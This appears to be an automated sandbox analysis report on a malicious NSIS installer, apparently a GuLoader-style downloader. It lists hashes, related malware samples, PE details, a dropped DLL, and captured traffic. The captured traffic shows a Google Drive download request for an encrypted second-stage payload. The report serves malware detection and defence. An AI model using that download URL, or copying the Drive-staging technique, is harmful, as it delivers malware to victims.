https://drive.usercontent.google.com/	Vidneafhring.exe, 00000006.00000003.2683817868.0000000003BD6000.00000004.00000020.00020000.00000000.sdmp, Vidneafhring.exe, 00000006.00000003.2713022494.0000000003BD9000.00000004.00000020.00020000.00000000.sdmp, Vidneafhring.exe, 00000006.00000002.2760364198.0000000003BD9000.00000004.00000020.00020000.00000000.sdmp	false	high
https://drive.google.com/L	Vidneafhring.exe, 00000006.00000002.2760257608.0000000003B68000.00000004.00000020.00020000.00000000.sdmp	false	high
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd	Vidneafhring.exe, 00000006.00000001.2559423242.00000000005F2000.00000020.00000001.01000000.00000009.sdmp	false	high
http://nsis.sf.net/NSIS_Error	Vidneafhring.exe	false	high
https://apis.google.com	Vidneafhring.exe, 00000006.00000003.2677151559.0000000003BD9000.00000004.00000020.00020000.00000000.sdmp	false	high
http://nsis.sf.net/NSIS_ErrorError	Vidneafhring.exe	false	high
https://drive.google.com/4	Vidneafhring.exe, 00000006.00000002.2760257608.0000000003B68000.00000004.00000020.00020000.00000000.sdmp	false	high
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214	Vidneafhring.exe, 00000006.00000001.2559423242.0000000000649000.00000020.00000001.01000000.00000009.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
142.250.185.78	drive.google.com	United States		15169	GOOGLEUS	false
216.58.206.33	drive.usercontent.google.com	United States		15169	GOOGLEUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1619374
Start date and time:	2025-02-19 20:34:17 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 22s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Vidneafhring.exe
Detection:	MAL
Classification:	mal80.troj.evad.winEXE@3/27@2/2
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 92% Number of executed functions: 64 Number of non-executed functions: 24
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.60
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	Doc171836.js	Get hash	malicious	BruteRatel, Latrodectus	Browse	142.250.185.78 216.58.206.33
	DHL RPA GRBP Template.PDF.js	Get hash	malicious	Remcos	Browse	142.250.185.78 216.58.206.33
	rSlutelementer.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	142.250.185.78 216.58.206.33
	Payment Summary 2025 11 2.exe	Get hash	malicious	GuLoader	Browse	142.250.185.78 216.58.206.33
	Payment Summary 2025 11 2.exe	Get hash	malicious	GuLoader	Browse	142.250.185.78 216.58.206.33
	000027_A-000032.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	142.250.185.78 216.58.206.33
	GetPress.exe	Get hash	malicious	Unknown	Browse	142.250.185.78 216.58.206.33
	New Order_List doc.exe	Get hash	malicious	Discord Token Stealer, GuLoader	Browse	142.250.185.78 216.58.206.33
	RFQ March order Ref 28101.exe	Get hash	malicious	GuLoader	Browse	142.250.185.78 216.58.206.33
	KrustyPaperjre.lnk.download.lnk	Get hash	malicious	Unknown	Browse	142.250.185.78 216.58.206.33

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nsi680F.tmp\System.dll	IMG635673567357735773573757875883587935775753Bjlkeloftet.exe	Get hash	malicious	Remcos, GuLoader	Browse
	CEBI Order_ tlumaczenie dokumentow dostawy do CEBI PL11.10.24Frakoblet.exe	Get hash	malicious	Remcos	Browse
	DEMASI-24-12B DOC. SCAN.exe	Get hash	malicious	GuLoader, Remcos	Browse
	CEBI_ tlumaczenie dokumentow dostawy do CEBI PL_ 11.08.24.exe	Get hash	malicious	Remcos, GuLoader	Browse
	rIMGCY46473567583458675867864894698467458.exe	Get hash	malicious	Remcos, GuLoader	Browse
	RAINBOW_ tlumaczenie dokumentow dostawy do CEBI PL_ 11.08.24.exe	Get hash	malicious	GuLoader, Remcos	Browse
	rNuevo_Pedido_129149.exe	Get hash	malicious	GuLoader	Browse
	rNuevo_Pedido_129149.exe	Get hash	malicious	GuLoader	Browse
	zamowienie.exe	Get hash	malicious	GuLoader	Browse
	zamowienie.exe	Get hash	malicious	GuLoader	Browse

Process:	C:\Users\user\Desktop\Vidneafhring.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5632
Entropy (8bit):	4.004531061976898
Encrypted:	false
SSDEEP:	48:im1gEhmNd2MPUptxENJ5imMOBAZqMTBCpYwvNHZzUJvR0J56of5dwe:F1qdBGE75LBAZqIFeZUR0zPd
MD5:	2A0F58BAA9F48961707195D3D9AB8D0A
SHA1:	ABB640F58BD2A3FC50CD130BD960015DF7A2A345
SHA-256:	A9520CE3BCFA4CFB7D9BE3D317BDB3068246B38292E6D291A55F1B04A158998E
SHA-512:	273356A565978FF58D223E4D84DE85D257838B1C37AE33054DE76401AC935FD26F54213424AD8164BAE2C4F9D9F2D61CBDD24BBAAD453DA938E0DCA26B98130A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 1%, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9...}.}.}.}.e.....z.)........\|....\|.Rich}.........PE..L....C.f...........!......................... ...............................`............@.........................p"..I...` ..P....@..`....................P....................................................... ..`............................text............................... ..`.rdata....... ......................@..@.data...l....0......................@....rsrc...`....@......................@..@.reloc..j....P......................@..B................................................................................................................................................................................................................................................................................................................................................................

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.793226255795457
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Vidneafhring.exe
File size:	1'105'632 bytes
MD5:	24c3013ee542b77eb416866a4dcdf66e
SHA1:	3d9ae42b17acc38c9f8425124ddc7fdc7fbde6c0
SHA256:	f13819d061e77a6a071a72f23e5daa4751db395492773280bd8e6285f0942e84
SHA512:	0694c1b57c5e0fab3218719f195632ad6a519312f812056d05d87da7e455aae4fd2f370b1d4d057798f328f2f218ac396b9b496a71614139dbb5248242993b45
SSDEEP:	24576:ZSafgu8S1aLLwWOroUmLDbZ7Jjl7WqDs3Ryo:ZlfguN1GLwWObSFhWquRh
TLSH:	FC3522F2BB6468F5DB20873E346B9D5A56B1BE7138F41B963B9C3B1D2E72021430B145
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F......F...G.w.F......F...v...F...@...F.Rich..F.........PE..L....C.f.................d...........3............@

Entrypoint:	0x4033a2
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x660843F1 [Sat Mar 30 16:55:13 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	671f2a1f8aee14d336bab98fea93d734

Signature Valid:	false
Signature Issuer:	CN=Thoracostracan, E=Bespout@Multifunktionsko.Nom, O=Thoracostracan, L=Ebertshausen, OU="Unavailed Ekspansion ", S=Rheinland-Pfalz, C=DE
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	15/04/2024 08:05:15 15/04/2025 08:05:15
Subject Chain	CN=Thoracostracan, E=Bespout@Multifunktionsko.Nom, O=Thoracostracan, L=Ebertshausen, OU="Unavailed Ekspansion ", S=Rheinland-Pfalz, C=DE
Version:	3
Thumbprint MD5:	DD9EBB3BFB3B1156CC05C41B422AFC8C
Thumbprint SHA-1:	5DF35858C6DC9F7C2928970106D0C8497E7C90A8
Thumbprint SHA-256:	02B623A8BC3698EA20679DF6198E7DBA9FB65FA99CB1E76BEA7EDB8A9CAA53C6
Serial:	21F75D39F9361BA117D671CB49E2548FD7161DBB

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8430	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x49000	0x28570	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x10d028	0xeb8
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x294	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x628a	0x6400	c4a2423b5674bfa0f784f8a541b55665	False	0.6612109375	data	6.390159547186612	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1234	0x1400	d169790bd6b8e7821b264cddc934c496	False	0.4265625	data	5.032486821165516	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x1a438	0x400	c8ea57e3d910ccbc8ce8b96488c46e9b	False	0.6474609375	data	5.255785049642427	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x25000	0x24000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x49000	0x28570	0x28600	3a505d8e93dd6ec23ac8b59005e755df	False	0.46901606037151705	data	5.340542879000782	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x49388	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	United States	0.38218679758665564
RT_ICON	0x59bb0	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 38016	English	United States	0.5192085347908345
RT_ICON	0x63058	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 21600	English	United States	0.55318853974122
RT_ICON	0x684e0	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States	0.5208431743032593
RT_ICON	0x6c708	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.6046680497925311
RT_ICON	0x6ecb0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.6151500938086304
RT_ICON	0x6fd58	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.6758196721311476
RT_ICON	0x706e0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.7349290780141844
RT_DIALOG	0x70b48	0xb8	data	English	United States	0.6467391304347826
RT_DIALOG	0x70c00	0x144	data	English	United States	0.5216049382716049
RT_DIALOG	0x70d48	0x100	data	English	United States	0.5234375
RT_DIALOG	0x70e48	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x70f68	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x70fc8	0x76	data	English	United States	0.7457627118644068
RT_VERSION	0x71040	0x29c	data	English	United States	0.5104790419161677
RT_MANIFEST	0x712e0	0x290	XML 1.0 document, ASCII text, with very long lines (656), with no line terminators	English	United States	0.5625

DLL	Import
ADVAPI32.dll	RegEnumValueA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, RegOpenKeyExA, RegCreateKeyExA
SHELL32.dll	SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA, ShellExecuteExA
ole32.dll	OleUninitialize, OleInitialize, IIDFromString, CoCreateInstance, CoTaskMemFree
COMCTL32.dll	ImageList_Destroy, ImageList_AddMasked, ImageList_Create
USER32.dll	SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcA, GetMessagePos, CheckDlgButton, LoadCursorA, SetCursor, GetSysColor, SetWindowPos, GetWindowLongA, IsWindowEnabled, SetClassLongA, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetDlgItemTextA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, MessageBoxIndirectA, CharPrevA, PeekMessageA, GetClassInfoA, DispatchMessageA, TrackPopupMenu
GDI32.dll	GetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor
KERNEL32.dll	CreateFileA, GetTempFileNameA, ReadFile, RemoveDirectoryA, CreateProcessA, CreateDirectoryA, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceA, lstrcpynA, SetErrorMode, GetVersionExA, lstrlenA, GetCommandLineA, GetTempPathA, GetWindowsDirectoryA, WriteFile, ExitProcess, CopyFileA, GetCurrentProcess, GetModuleFileNameA, GetFileSize, GetTickCount, Sleep, SetFileAttributesA, GetFileAttributesA, SetCurrentDirectoryA, MoveFileA, GetFullPathNameA, GetShortPathNameA, SearchPathA, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, GetModuleHandleA, LoadLibraryExA, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv, lstrcpyA, MoveFileExA, lstrcatA, WideCharToMultiByte, GetSystemDirectoryA, GetProcAddress, GetExitCodeProcess, WaitForSingleObject, SetEnvironmentVariableA

Description	Data
Comments	plainchant untakeableness demidome
FileVersion	3.4.0.0
LegalTrademarks	bunkerman antimere conchyliferous
OriginalFilename	virkelighedssansen.exe
ProductName	ceratorhine
ProductVersion	3.4.0.0
Translation	0x0409 0x04b0

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 19, 2025 20:37:22.537163019 CET	59139	53	192.168.2.8	1.1.1.1
Feb 19, 2025 20:37:22.544636965 CET	53	59139	1.1.1.1	192.168.2.8
Feb 19, 2025 20:37:23.896176100 CET	62579	53	192.168.2.8	1.1.1.1
Feb 19, 2025 20:37:23.905282021 CET	53	62579	1.1.1.1	192.168.2.8

Timestamp	Bytes transferred	Direction	Data
2025-02-19 19:37:23 UTC	216	OUT	GET /uc?export=download&id=10gYJMPNy2et7V1tdqyjpPguruAcX-tA8 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0 Host: drive.google.com Cache-Control: no-cache
2025-02-19 19:37:23 UTC	1610	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Wed, 19 Feb 2025 19:37:23 GMT Location: https://drive.usercontent.google.com/download?id=10gYJMPNy2et7V1tdqyjpPguruAcX-tA8&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce--Rgc4jyOToUbxb_HT8F4Qw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Timestamp	Bytes transferred	Direction	Data
2025-02-19 19:37:24 UTC	258	OUT	GET /download?id=10gYJMPNy2et7V1tdqyjpPguruAcX-tA8&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2025-02-19 19:37:27 UTC	5010	IN	HTTP/1.1 200 OK X-GUploader-UploadID: AHMx-iEjerfzlaKxENUHv3M_3_rC_OLXnCqysRbXJZvitbly9-s5kfTCYa0Nq9t-NWWnbeyV Content-Type: application/octet-stream Content-Security-Policy: sandbox Content-Security-Policy: default-src 'none' Content-Security-Policy: frame-ancestors 'none' X-Content-Security-Policy: sandbox Cross-Origin-Opener-Policy: same-origin Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Resource-Policy: same-site X-Content-Type-Options: nosniff Content-Disposition: attachment; filename="RUsjBNgY13.bin" Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED] Access-Control-Allow-Methods: GET,HEAD,OPTIONS Accept-Ranges: bytes Content-Length: 289856 Last-Modified: Tue, 18 Feb 2025 07:50:12 GMT Date: Wed, 19 Feb 2025 19:37:26 GMT Expires: Wed, 19 Feb 2025 19:37:26 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=K8IOLA== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2025-02-19 19:37:27 UTC	5010	IN	Data Raw: 25 b3 af c4 13 e1 bd 6f 1b c6 1b 5c 09 5d 9d b6 d1 a5 d0 46 03 be b5 c0 de b6 0a b6 00 eb e6 d6 c5 c1 06 89 1d d0 cc ee ca 9d b6 37 15 30 38 06 1d ba 6c c4 ec cf d3 64 26 a5 eb 91 c4 5b 5c 3c 43 cf 0b 8b df e8 1e 26 6e 64 61 c9 e4 d6 7f 2e 23 ca 30 20 de 5e d3 47 9a 4f e4 b2 94 60 3a ee 23 28 76 3f a1 74 13 02 a7 a7 af 0f 36 98 6c 64 54 9d 3e bf a0 72 9a ea f2 51 b6 6a 74 84 8b e2 58 9c 00 d9 3a 99 9b 57 f2 54 96 20 ad df 73 d0 81 f0 cb f2 9a fe 78 b4 5a 5f 62 88 34 9c 23 aa 7d 46 65 90 d6 a0 2c ff c6 16 8e 3e 15 3c 90 dd 8d 26 a5 dd e6 38 63 4d 71 fd 6b e8 95 4a fb 87 13 d0 a1 bf eb 22 cc b7 a5 f6 ac bf 86 ef 46 1f ee 88 63 85 50 fa 33 6b 14 6f 39 11 e3 08 dd 6a b4 d6 da f8 a3 3c ad a9 3b 67 36 fb 38 5c 60 1a 63 c0 41 ae b0 13 69 1f 7b bd f3 2b 79 a6 fb Data Ascii: %o\]F708ld&[\<C&nda.#0 ^GO`:#(v?t6ldT>rQjtX:WT sxZ_b4#}Fe,><&8cMqkJ"FcP3ko9j<;g68\`cAi{+y
2025-02-19 19:37:27 UTC	4674	IN	Data Raw: 22 3e ac bc 19 27 06 b5 17 0a 57 56 b1 f0 8d 33 0d 3d 53 3f ab a3 69 99 ab 78 22 2e 31 bb 36 cf 11 ae 30 38 e6 a7 2f 19 f4 4a 00 4a 7b a6 bb e7 a2 bd 83 48 d0 95 d9 37 83 b3 d8 2b f3 d1 22 bd 93 38 74 8b 48 c7 0f 46 96 95 af c5 a6 87 f0 24 52 ca 8d 02 74 10 fa 6d a7 f3 c8 4b 20 82 97 03 cb d1 b6 a7 3a fb 7f c2 f4 48 ce 6e 9f fe 75 6b be 57 54 d1 78 2a 3b bf c0 32 10 6d 51 c4 40 de 79 f1 23 18 51 13 88 85 cf d2 30 4b 64 81 1a b2 a5 bb 9e 7f e5 ed 80 08 1a 3b 09 e0 57 9b 4d 84 01 51 2a 35 87 f7 a4 70 e6 43 89 0f 69 a0 84 d1 81 64 99 91 25 e0 20 84 d6 f1 eb ce 43 27 9e a2 1a 66 e4 3a ab 85 53 f8 77 4e 16 00 5a 9c 8e ce c8 02 a2 bc 90 b2 f2 17 23 f0 3b 12 45 4c 62 05 b6 0a ef 8e 4d 5d 7a 3e b3 76 1a 98 86 6e 1e 66 1c ee 1d cd c3 10 de f6 26 fc f9 30 cc cd 50 Data Ascii: ">'WV3=S?ix".1608/JJ{H7+"8tHF$RtmK :HnukWTx;2mQ@y#Q0Kd;WMQ5pCid% C'f:SwNZ#;ELbM]z>vnf&0P
2025-02-19 19:37:27 UTC	1326	IN	Data Raw: 06 aa 59 5f 64 c6 06 d5 cc f7 29 08 e1 65 57 6b 25 04 b3 15 83 c3 38 be dc 61 60 a2 be 52 d0 a8 cd e9 a2 38 24 c3 f6 f7 2e e3 8b 84 d4 04 b8 7d 8f 63 c9 5a 20 03 26 07 f1 ea 35 e4 20 f6 1d 0a de 95 37 b7 9c 61 76 d2 71 4e 8d f6 b0 32 16 b9 6b f1 82 a8 f1 8c 97 35 44 09 8e 16 c1 c5 6b 51 3d be 96 35 4e c9 9f 37 e2 07 42 0c b7 4f 89 9b 06 f3 56 91 ac bf c0 98 93 b0 90 c7 38 3b 07 d5 ba 58 74 0f d3 30 36 cc 9e 38 af 65 93 6d 52 7d 9f 8f af de 29 c5 c9 2c 96 38 35 dc cd a8 f1 1c 6f 8b 41 d5 2d ad 1a e7 a8 42 8b f0 53 61 89 a9 4c 9e b4 64 c7 b9 bf 80 35 01 aa 00 58 5b da 57 06 69 d8 28 10 4c 02 19 ba 81 0c 29 c3 eb 27 72 98 bd a7 cb 0a d0 c8 fc 54 75 94 df 1a 6b cb d2 c5 c1 69 bb de 96 2d 4a 0b ca 27 55 94 12 ae c5 4c 2e c7 7f 3f 64 dd e3 73 fd da fc b7 f2 fc Data Ascii: Y_d)eWk%8a`R8$.}cZ &5 7avqN2k5DkQ=5N7BOV8;Xt068emR}),85oA-BSaLd5X[Wi(L)'rTuki-J'UL.?ds
2025-02-19 19:37:27 UTC	1390	IN	Data Raw: 2f 0a ce 88 2d f7 74 0c 19 d0 75 b2 19 51 48 57 24 42 03 f9 8f 3d 00 9d 02 d8 81 04 dc 0e c1 e4 03 7c 5e ae af f4 2d bd 0a 7f a9 ee ae 6c 14 00 d5 e5 37 ca 8c 6f 3b 08 f0 57 13 04 b7 28 a0 36 f4 fe 4d c4 2b 38 33 cc de 4c e7 05 2e 57 c6 52 61 d4 15 10 28 f7 f6 2b 60 f6 21 32 59 c8 c1 bd 71 e7 85 47 1f 65 de dc 99 76 f0 70 d6 b1 27 ee 15 e1 12 c1 95 e0 79 35 b0 9f dd cb c9 92 0d 4a f7 4d 5d 5b 75 51 69 19 d3 1a 66 92 9e 30 12 a3 66 27 c3 76 13 7b f8 1c e5 17 23 05 16 42 65 90 2b f3 a5 fa d3 8e d6 34 c6 4b 53 42 10 c8 a8 37 5d 0a 6b f8 7a 20 a7 fe 41 74 94 f2 72 20 d9 cd 94 b6 79 2b 58 51 51 e5 eb 14 e5 d7 cd 9b 6c 7f 02 49 51 a7 77 d8 6b bd 0f d9 f7 00 b5 ce 9b a2 e1 0a 3b 7b 2a 85 f6 e9 69 5f 8f ce aa de af d1 cf 54 4a eb 5d 29 f7 17 7b 86 99 17 9d fb a4 Data Ascii: /-tuQHW$B=\|^-l7o;W(6M+83L.WRa(+`!2YqGevp'y5JM][uQif0f'v{#Be+4KSB7]kz Atr y+XQQlIQwk;{*i_TJ]){
2025-02-19 19:37:27 UTC	1390	IN	Data Raw: bc 2f e9 59 74 f6 67 c9 d5 65 c7 0e dc 8b dc 91 23 b7 f1 21 1e 19 d1 f5 05 c2 07 27 3f 7a 87 18 52 f6 31 39 ed 36 15 33 f8 1b 77 dd 58 30 10 19 81 ba d9 1b 36 5d 32 88 65 3f 7a 4e df ff bc 52 c0 41 7f 14 7a 2d 66 30 77 5a 81 75 42 9d 4d 7a 5e 29 97 c5 27 56 e1 9e 74 ca 17 01 d7 ed 21 b1 9d 7c 5b aa 41 ef 60 40 be e2 de e5 6e 83 dc 96 66 77 b5 9d 5c d6 fb 6f 5c 51 6a 8f ee 67 1c b8 88 1c 13 ed e6 ab 52 1c f4 2a c9 27 31 a8 71 17 6a 90 fc 04 07 08 f8 ed b2 18 3b 4b 82 18 64 b5 40 aa e0 b8 db 94 7d 05 06 07 4d 26 1d 79 f1 04 7d 99 e4 6a 38 2d f3 1c 08 1c 2b 3f eb 03 c9 10 d1 f9 4f 7c b0 64 e4 9c af 27 d7 6d 90 84 53 21 cb 68 92 0e 99 4a b7 e3 19 6d d1 00 d8 ba 48 bf 64 13 bc 0c db a2 7a b4 31 62 e0 0d bb 68 90 eb ea 7a 27 e1 f8 1e 34 a4 e2 f7 bb 7b 5c cc 23 Data Ascii: /Ytge#!'?zR1963wX06]2e?zNRAz-f0wZuBMz^)'Vt!\|[A`@nfw\o\QjgR*'1qj;Kd@}M&y}j8-+?O\|d'mS!hJmHdz1bhz'4{\#
